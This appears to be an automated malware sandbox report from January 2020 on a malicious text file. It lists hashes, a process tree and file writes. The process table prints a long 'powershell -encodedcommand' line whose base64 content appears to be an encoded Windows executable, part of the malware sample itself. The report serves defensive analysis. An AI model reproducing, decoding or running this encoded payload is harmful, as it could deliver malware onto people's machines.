download: | 36hqkWax |
Full analysis: | https://app.any.run/tasks/b3952906-bdd1-470f-8e7b-c876bb62f9b5 |
Verdict: | Malicious activity |
Analysis date: | January 17, 2020, 14:13:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with no line terminators |
MD5: | BD027E68238CEAFF773FED3264CC98C4 |
SHA1: | 45801E4EC5B88C05284BAE0B5B429A66246C28E5 |
SHA256: | 4EDAD1F0CA5E2E0BD5427AE9C2DA711EAA50CA470FC4C75F4AF28E50D92952F3 |
SSDEEP: | 768:+1Gxt8suqn7kH695c3wCFUkkDkai7I5Ej9Li+JQWDjP6ncCXotFhbc2z7reJ:5X8suSLwwCwkai85cLi343hbc2PreJ |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2108 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\36hqkWax | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1708 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\36hqkWax" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1552 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 3221225786 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1940 | powershell /? | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2256 | powershell -encodedcommand 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FBd+EgAABKIRFBhyKQIAcKIRFBl+GwAABKIRFBpyIwIAcKIRFChNAAAKohEVF34OAAAEohEVGHIjAgBwohEVGX4PAAAEohEVGnIjAgBwohEVG34UAAAEKE4AAAqiERUcciMCAHCiERUdfhUAAAQoTgAACqIRFR5yIwIAcKIRFR8JfhYAAAQoTgAACqIRFR8KciMCAHCiERUfC34LAAAEKE4AAAqiERUoTQAAChMLci0CAHB+KAAABBILKCcAAAYoSwAACihAAAAGJt5sJSgcAAAKEwwRDCgcAAAKEQwTDhEOKBwAAAoRDhMNKDUAAAooNQAACig1AAAK3j0lKBwAAAoTEBEQKBwAAAoREBMPEQ8oHAAAChEPExEWgA0AAAQoNQAACig1AAAKKDUAAAreCBESKE8AAArcfg0AAAQqAABBlAAAAAAAACcAAAASAAAAOQAAACsAAAAXAAABAAAAAGQAAAAMAAAAcAAAAC8AAAAXAAABAAAAACAAAAB/AAAAnwAAAC8AAAAXAAABAAAAAFIBAABmAQAAuAIAAC8AAAAXAAABAAAAAM4AAAAZAgAA5wIAADUAAAAXAAABAgAAACAAAAD8AgAAHAMAAAgAAAAAAAABEzABABAAAAARAAARAlAoUAAACgsSASgeAAAGKhswCQBoAQAAEgAAERcTC3I1AgBwCxgTC3JzAgBwFChRAAAKKCMAAAoMGRMLCBRytwIAcBeNBwAAARMFEQUWBygjAAAKohEFEwYRBhQUF40xAAABEwcRBxYXnBEHKFIAAAoRBxaQLAoRBhaaKCMAAAoLKCMAAAoNGhMLCXQzAAABb1MAAAoTCCs9EQhvVAAACigjAAAKEwQoNQAAChcTCRwTCxEEFHLLAgBwFo0HAAABFBQUKFIAAApvJgAACgrdpgAAAB0TCxEIb1UAAAotuhEIdTQAAAEsDBEIdTQAAAFvVgAACh4TC3LjAgBwCt563ngRChdYFhMKRQoAAAAAAAAA5/7///D+//8E////Uv///3L///96////nv///7/////K////3jcRCxMKEQlFAgAAAAAAAAC3////3iJ1FwAAART+AxEJFv4DXxEKFv4BX/4RdBcAAAEoHAAACt7JIDMACoAoVwAACnoGEQosBSg1AAAKKkEcAAABAAAAAAAAADABAABGAQAADAAAADABAAAbMAMA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AAAKFkC9AAAABheaE0sRS3KLBgBwFig6AAAKFjMSBhiaBhmaFyhCAAAGJt1MDgAAEUtyjwYAcBYoOgAAChYzZAYYmgYZmhcoQgAABiZykwYAcH4oAAAEBheafigAAAQobQAACgYXmnIRAQBwKCwAAAYoIwAACigjAAAKKCMAAAoobgAACigjAAAKKCMAAAooIwAACihMAAAKKEAAAAYm3dgNAAARS3KlBgBwFig6AAAKFjMNBhiaKCUAAAbduw0AAN22DQAAEQdyqQYAcBYoOgAAChYuBTjAAQAABhiaFm9vAAAKHx9AnAAAAHMvAAAKExMGFpp+KAAABAYXmn4oAAAEKG0AAApvNAAAChMSERMCERICjrcREtpvcAAAChETb3EAAAooRAAABgvdwAAAACUoHAAAChMWERYoHAAAChEWExQRFCgcAAAKERQTFXKvBgBwfigAAARytwYAcChLAAAKKEAAAAYmctMGAHAoQAAABiYoNQAACig1AAAKKDUAAArd9QwAAHNyAAAKDQkGGJpvcwAACgveVyUoHAAAChMXERcoHAAAChEXExgRGCgcAAAKERgTGXKvBgBwfigAAARy2wYAcChLAAAKKEAAAAYmctMGAHAoQAAABiYoNQAACig1AAAKKDUAAArdjAwAAABy0wYAcChAAAAGJhEGcvkGAHAGF5ooSwAAChMGEQYHKHQAAAoRBihsAAAKJnKvBgBwfigAAARy/QYAcBEGcy4AAApvOAAACihtAAAKKEAAAAYm3TQMAAAlKBwAAAoTGhEaKBwAAAoRGhMbERsoHAAAChEbExxyrwYAcH4oAAAEchcHAHARHG8eAAAKKG0AAAooQAAABiYoNQAACig1AAAKKDUAAArd4QsAABEHE0wRTHI1BwBwFig6AAAKFkDUAgAABheaFo0hAAABKCwAAAZ0CQAAGxMdBhmabzQAAAofCv4 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294770688 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRCC34.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1940 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FJ16UNTQF85PUTLE467Z.temp | — | |
MD5:— | SHA256:— | |||
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WLE6IIDDXGCP8UROHC8N.temp | — | |
MD5:— | SHA256:— | |||
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bdbf9.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1940 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3a4991.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C5D62F7EB862B07B7D3011278C0161E8 | SHA256:7F6BE70408EFD599A2F07A7FA2D6CDA25464578D1E89BEE3DE83E4567D64F848 | |||
1940 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$hqkWax | pgc | |
MD5:10505AAEDF1F3942809338D8E27ED483 | SHA256:20A1F4D3F3D85FB5D42729E9C97EDFA9382B09E889D4AD96C003313A0792BAC2 |